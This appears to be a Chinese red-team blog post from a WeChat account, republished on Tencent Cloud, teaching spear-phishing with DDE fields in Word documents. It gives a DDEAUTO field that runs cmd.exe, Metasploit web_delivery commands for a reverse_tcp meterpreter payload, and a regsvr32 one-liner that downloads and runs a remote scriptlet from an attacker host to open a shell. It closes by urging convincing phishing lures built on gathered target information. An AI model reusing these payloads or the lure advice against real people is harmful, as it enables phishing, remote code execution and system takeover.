前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >鱼叉钓鱼:利用 Office 文档进行 DDE 攻击

鱼叉钓鱼:利用 Office 文档进行 DDE 攻击

作者头像
渗透攻击红队
发布2021-04-22 09:47:36
1K0
发布2021-04-22 09:47:36
举报
文章被收录于专栏:漏洞知识库漏洞知识库

渗透攻击红队

一个专注于红队攻击的公众号

大家好,这里是 渗透攻击红队 的第 54 篇文章,本公众号会记录一些红队攻击的笔记(由浅到深),不定时更新

DDE

DDE 是一个自定义字段,用户可插入文档。这些字段允许用户输入简单的说明,包括插入到新文档中的数据及插入位置。攻击者可以创建包含DDE字段的恶意Word文件(而不需要打开另一个Office应用程序)、打开命令提示符和运行恶意代码。

通常情况下,Office应用程序会显示两项告警内容。第一个是关于包含指向其他文件的链接的文档告警,第二个是关于打开远程命令提示符的错误告警。

在MSWord和MSExcel里,我们可以使用DDE来执行命令。

DDE 攻击演示

DDE 攻击打开 calc

首先通过 word 文档设置一个域代码:crlt+f9,或者选中“插入”-“文件部件”-“”,选中第一个 = (Formula) 然后右键切换域代码来编辑代码,插入下面的内容:

然后再里面输入测试代码:

代码语言:javascript
复制
DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"

保存后重新打开 word 文档:

点击两次“是”就会调用 DDE 执行 calc.exe:

Metasploit + DDE = Meterpreter

那如果是要反弹 shell 的话需要借助 MSF 来帮助我们:

代码语言:javascript
复制
msf > use exploit/multi/script/web_delivery
msf > set target 3
msf > set payload windows/meterpreter/reverse_tcp_uuid 
msf > set lhost 192.168.201.237
msf > set lport 8081
msf exploit(multi/script/web_delivery) > exploit -j 
[*] Exploit running as background job 0.

得到的反弹代码是:

代码语言:javascript
复制
regsvr32 /s /n /u /i:http://192.168.201.237:8080/sgnNsSYg.sct scrobj.dll

然后我们在 DDE 里插入代码(注意引号):

代码语言:javascript
复制
DDEAUTO c:\\windows\\system32\\cmd.exe "/k regsvr32 /s /n /u /i:http://192.168.201.237:8080/sgnNsSYg.sct scrobj.dll"

最后保存再打开 word 文档即可反弹 shell 到 msf :

结尾

DDE 攻击比较老了,不过在渗透中难免还是会碰到;关于 DDE 攻击的缺点就在于目标必须要点击两次“是”才能够执行 DDE 代码进行攻击,而至于怎样才能让目标心甘情愿的点击,那就靠各位如何包装钓鱼邮件,和如何实施了,一份逼真的钓鱼鱼饵在于你搜集到目标的信息是否准确真实,在此不多解释大家都懂。

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-04-20,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 渗透攻击红队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档